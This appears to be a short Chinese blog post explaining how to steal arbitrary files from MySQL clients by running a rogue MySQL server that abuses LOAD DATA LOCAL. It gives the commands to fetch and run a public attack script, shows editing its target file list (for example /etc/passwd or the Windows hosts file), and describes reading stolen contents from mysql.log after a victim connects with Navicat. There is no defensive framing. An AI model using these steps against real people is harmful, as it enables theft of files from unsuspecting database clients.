Mysql读取客户端任意文件

漏洞成因

Mysql客户端可以利用load data local 命令读取任意文件。

服务器

攻击脚本地址:
https://github.com/allyshka/Rogue-MySql-Server

服务器执行:



wget https://github.com/allyshka/Rogue-MySql-Server.git
cd Rogue-MySql-Server
#如果针对客户端为windows,将rogue_mysql_server.py的26-28行换成以下内容
filelist = (
	#'/etc/passwd',
	r'c:\windows\system32\drivers\etc\hosts',
)
python rogue_mysql_server.py

攻击者

利用Navicat进行连接Mysql服务。
logo

查看结果

登入服务器,查看mysql.log即可读取文件内容。
logo


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!